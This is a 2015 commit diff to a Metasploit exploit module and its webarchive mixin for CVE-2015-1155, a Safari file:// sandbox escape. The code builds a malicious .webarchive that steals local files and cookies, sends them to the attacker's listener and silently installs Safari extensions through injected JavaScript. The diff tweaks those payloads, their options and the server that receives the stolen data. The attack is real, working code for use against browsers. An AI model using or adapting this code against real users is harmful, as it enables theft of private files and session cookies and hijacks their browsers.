Tweak and fix some things in Safari file URL module.

joevennix · joevennix · commit 8b6fba4988f9 · 2015-06-24T02:08:06.000-05:00
diff --git a/lib/msf/core/format/webarchive.rb b/lib/msf/core/format/webarchive.rb
@@ -1,23 +1,26 @@
-#safari.installExtension("com.pinterest.extension-HWZFLG9PNK","http://assets.pinterest.com/ext/Pinterest-Safari.safariextz")
-
+#
+# The WebArchive mixin provides methods for generating a Safari .webarchive file
+# that performs a variety of malicious tasks: stealing files, cookies, and silently
+# installing extensions from extensions.apple.com.
+#
 module Msf
 module Format
 module Webarchive
 
   def initialize(info={})
     super
-    register_options(
-      [
-        OptString.new('FILENAME', [ true, 'The file name',  'msf.webarchive']),
-        OptString.new('GRABPATH', [false, "The URI to receive the UXSS'ed data", 'grab']),
-        OptString.new('DOWNLOAD_PATH', [ true, 'The path to download the webarchive', '/msf.webarchive']),
-        OptString.new('FILE_URLS', [false, 'Additional file:// URLs to steal. $USER will be resolved to the username.', '']),
-        OptBool.new('STEAL_COOKIES', [true, "Enable cookie stealing", true]),
-        OptBool.new('STEAL_FILES', [true, "Enable local file stealing", true]),
-        OptString.new('EXTENSION_URL', [false, "HTTP URL of a Safari extension to install"]),
-        OptString.new('EXTENSION_ID', [false, "The ID of the Safari extension to install"])
-      ],
-      self.class)
+    register_options([
+      OptString.new("URIPATH", [false, 'The URI to use for this exploit (default is random)']),
+      OptString.new('FILENAME', [ true, 'The file name',  'msf.webarchive']),
+      OptString.new('GRABPATH', [false, "The URI to receive the UXSS'ed data", 'grab']),
+      OptString.new('DOWNLOAD_PATH', [ true, 'The path to download the webarchive', '/msf.webarchive']),
+      OptString.new('FILE_URLS', [false, 'Additional file:// URLs to steal. $USER will be resolved to the username.', '']),
+      OptBool.new('STEAL_COOKIES', [true, "Enable cookie stealing", true]),
+      OptBool.new('STEAL_FILES', [true, "Enable local file stealing", true]),
+      OptBool.new('INSTALL_EXTENSION', [true, "Silently install a Safari extensions (requires click)", false]),
+      OptString.new('EXTENSION_URL', [false, "HTTP URL of a Safari extension to install", "https://data.getadblock.com/safari/AdBlock.safariextz"]),
+      OptString.new('EXTENSION_ID', [false, "The ID of the Safari extension to install", "com.betafish.adblockforsafari-UAMUU4S2D9"])
+    ], self.class)
   end
 
   ### ASSEMBLE THE WEBARCHIVE XML ###
@@ -90,8 +93,7 @@ def wrap_with_script(&blk)
   def iframes_container_html
     hidden_style = "position:fixed; left:-600px; top:-600px;"
     wrap_with_doc do
-      frames = "<iframe src='#{apple_extension_url}' style='#{hidden_style}'></iframe>"
-      communication_js + frames + injected_js_helpers + steal_files + install_extension + message
+      communication_js + injected_js_helpers + steal_files + install_extension + message
     end
   end
 
@@ -115,18 +117,23 @@ def apple_extension_url
   end
 
   def install_extension
+    return '' unless datastore['INSTALL_EXTENSION']
+    raise "EXTENSION_URL datastore option missing" unless datastore['EXTENSION_URL'].present?
+    raise "EXTENSION_ID datastore option missing" unless datastore['EXTENSION_ID'].present?
     wrap_with_script do
       %Q|
       var extURL = atob('#{Rex::Text.encode_base64(datastore['EXTENSION_URL'])}');
       var extID = atob('#{Rex::Text.encode_base64(datastore['EXTENSION_ID'])}');
 
-      setTimeout(function(){
+      window.onclick = function(){
+        x = window.open('#{apple_extension_url}', 'x');
+
         function go(){
           window.focus();
           window.open('javascript:safari&&(safari.installExtension\|\|(window.top.location.href.match(/extensions/)&&window.top.location.reload(false)))&&(safari.installExtension("'+extID+'", "'+extURL+'"), window.close());', 'x')
         }
         setInterval(go, 400);
-      }, 600);
+      };
 
       |
     end
@@ -326,7 +333,7 @@ def injected_js_helpers
 
   # @return [String] the path to send data back to
   def collect_data_uri
-    '/' + datastore["URIPATH"].chomp('/').gsub(/^\//, '') + '/'+datastore["GRABPATH"]
+    '/' + (datastore["URIPATH"] || '').chomp('/').gsub(/^\//, '') + '/'+datastore["GRABPATH"]
   end
 
   # @return [String] formatted http/https URL of the listener
diff --git a/modules/auxiliary/gather/safari_file_url_navigation.rb b/modules/auxiliary/gather/safari_file_url_navigation.rb
@@ -16,19 +16,20 @@ def initialize(info = {})
     super(update_info(info,
       'Name'        => 'Mac OS X Safari file:// Redirection Sandbox Escape',
       'Description' => %q{
-        Due to an issue in the way Safari handles error page origins,
-        an attacker who can entice a user into visiting a malicious page
-        can gain a reference to the resulting error page in the file:// scheme.
-        From there, the attacker can access cross-domain globals, such as 'location'
-        and 'history,' which leads to a total compromise of the sandbox.
+        Versions of Safari before 8.0.6, 7.1.6, and 6.2.6 are vulnerable to a
+        "state management issue" that allows a browser window to be navigated
+        to a file:// URL. By dropping and loading a malicious .webarchive file,
+        an attacker can read arbitrary files, inject cross-domain Javascript, and
+        silently install Safari extensions.
       },
       'License'     => MSF_LICENSE,
       'Author'      => [
         'joev' # discovery, module
       ],
       'References'  => [
         ['ZDI', '15-288'],
-        ['CVE', '2015-1155']
+        ['CVE', '2015-1155'],
+        ['URL', 'https://support.apple.com/en-us/HT204826']
       ],
       'Platform'    => 'osx',
       'Targets'     =>
@@ -40,12 +41,11 @@ def initialize(info = {})
     ))
 
 
-    register_options(
-      [
-        OptString.new("URIPATH", [false, 'The URI to use for this exploit (default is random)']),
-        OptPort.new('SRVPORT',   [true, "The local port to use for the FTP server", 8081]),
-        OptPort.new('HTTPPORT',  [true, "The HTTP server port", 8080])
-      ], self.class )
+    register_options([
+      OptString.new("URIPATH", [false, 'The URI to use for this exploit (default is random)']),
+      OptPort.new('SRVPORT',   [true, "The local port to use for the FTP server", 8081]),
+      OptPort.new('HTTPPORT',  [true, "The HTTP server port", 8080])
+    ], self.class)
   end
 
   def lookup_lhost(c=nil)
@@ -59,19 +59,16 @@ def lookup_lhost(c=nil)
 
   def on_request_uri(cli, req)
     if req.method =~ /post/i
+      data_str = req.body.to_s
       begin
-        data_str = if req.body.size > 0
-          req.body
-        else
-          req.qstring['data']
-        end
         data = JSON::parse(data_str || '')
         file = record_data(data, cli)
-        send_response(cli, 200, 'OK', '')
+        send_response_html(cli, '')
         print_good "data #{data.keys.join(',')} received and stored to #{file}"
       rescue JSON::ParserError => e # json error, dismiss request & keep crit. server up
-        print_error "Invalid JSON received."
-        send_not_found(cli)
+        file = record_data(data_str, cli)
+        print_error "Invalid JSON stored in #{file}"
+        send_response_html(cli, '')
       end
     elsif req.uri =~ /#{popup_path}$/
       send_response(cli, 200, 'OK', popup_html)
